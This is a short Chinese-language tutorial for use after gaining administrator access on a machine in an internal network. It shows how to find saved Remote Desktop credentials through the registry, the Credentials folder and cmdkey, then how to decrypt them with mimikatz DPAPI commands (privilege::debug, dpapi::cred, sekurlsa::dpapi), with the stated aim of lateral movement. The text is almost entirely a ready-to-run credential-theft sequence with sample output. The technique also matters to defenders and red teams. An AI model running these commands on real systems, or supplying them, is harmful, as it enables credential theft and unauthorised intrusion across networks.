前言
在获取内网机器管理员权限后,查看是否有保存到本地的RDP连接密码,对保存到本地的连接RDP密码进行解密,解密成功后可使用此凭据继续横向移动。
查看远程连接历史
reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /s

查看rdp文件
dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*
记住这个C:\Users\Lion\AppData\Local\Microsoft\Credentials\凭证目录,后面要用

如果在远程桌面连接勾选,允许我保存凭证

勾选记住我的凭证,将产生一个新的凭证

查看凭证
cmdkey /list

也可以打开控制面板->凭据管理器 查看凭证

获取guidMasterKey
mimikatz下可解密,我的凭证目录就是C:\Users\Lion\AppData\Local\Microsoft\Credentials\ , dpapi::cred /in:凭证目录\凭证文件,凭证文件随便一个都可以,因为解出来的guidMasterKey都是一样的。
privilege::debug
dpapi::cred /in:C:\Users\Lion\AppData\Local\Microsoft\Credentials\1F21DFB92A4E59D0FE5E17C164547656

得到guidMasterKey为5f7b6b6e-419f-4993-b9f9-85224ba91cae
获取Masterkey
sekurlsa::dpapi
根据guidMasterKey找到对应的Masterkey

得到masterkey为bf4a60021b82a639df2bd8cc01bbdf7e9ab4e0365f2ade1d35af0273767aba0d6be9374cfdeccd9f9f14acce26dcd7483364dd8b3ab8936d058103ccfdfc7494
解密RDP凭证
dpapi::cred /in:C:\Users\Lion\AppData\Local\Microsoft\Credentials\1F21DFB92A4E59D0FE5E17C164547656 /masterkey:bf4a60021b82a639df2bd8cc01bbdf7e9ab4e0365f2ade1d35af0273767aba0d6be9374cfdeccd9f9f14acce26dcd7483364dd8b3ab8936d058103ccfdfc7494
